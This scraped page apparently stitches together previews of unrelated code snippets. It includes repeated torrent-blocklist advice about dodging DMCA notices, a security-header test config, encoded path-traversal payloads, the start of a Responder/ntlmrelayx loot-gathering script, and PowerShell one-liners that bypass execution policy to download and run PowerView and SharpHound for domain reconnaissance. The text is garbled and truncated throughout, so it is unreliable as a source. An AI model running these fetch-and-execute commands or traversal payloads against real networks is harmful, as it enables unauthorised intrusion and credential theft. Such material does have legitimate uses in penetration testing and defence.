The Transmission torrent client has an option to set a Blocklist, which helps protect you from getting caught and having the DMCA send a letter/email.
It's as simple as downloading and installing the latest client:
| name: HTTP security response headers test suites | |
| # TOOLS | |
| # VENOM HOME: https://github.com/ovh/venom | |
| # VENOM RELEASE: https://github.com/ovh/venom/releases | |
| # VENOM ASSERTION KEYWORDS: https://github.com/ovh/venom#assertion | |
| # REF AND RUN | |
| # REF BASE: https://owasp.org/www-project-secure-headers/ | |
| # RUN CMD: venom run --var="target_site=https://righettod.eu" venom_security_headers_tests_suite.yml | |
| # venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" venom_security_headers_tests_suite.yml | |
| # venom run --var="target_site=https://righettod.eu" --var="internet_facing=true" --var="logout_url=/logout" venom_security_headers_tests_suite.yml |
| Wordlist == /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt | |
| Traversal encoding: | |
| =================== | |
| ../ | |
| ..\ | |
| ..\/ | |
| %2e%2e%2f | |
| %252e%252e%252f | |
| %c0%ae%c0%ae%c0%af |
The Transmission torrent client has an option to set a Blocklist, which helps protect you from getting caught and having the DMCA send a letter/email.
It's as simple as downloading and installing the latest client:
| #!/bin/bash | |
| # This script assumes Responder is in /opt/Responder | |
| # Error messages begone! | |
| exec 2>/dev/null | |
| # Hardcoded location for script output files | |
| OUTDIR=${HOME}'/working/loot/gathered' | |
| # Hardcoded location for ntlmrelayx's .sam file output directory | |
| NTLMRELAY=${HOME}'/working/loot/ntlmrelay' |
| # Domain Recon | |
| ## ShareFinder - Look for shares on network and check access under current user context & Log to file | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt" | |
| ## Import PowerView Module | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')" | |
| ## Invoke-BloodHound for domain recon | |
| powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound" |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| #!/usr/bin/env python | |
| """Simple HTTP Server With Upload. | |
| This module builds on BaseHTTPServer by implementing the standard GET | |
| and HEAD requests in a fairly straightforward manner. | |
| """ |
As configured in my dotfiles.
start new:
tmux
start new with session name: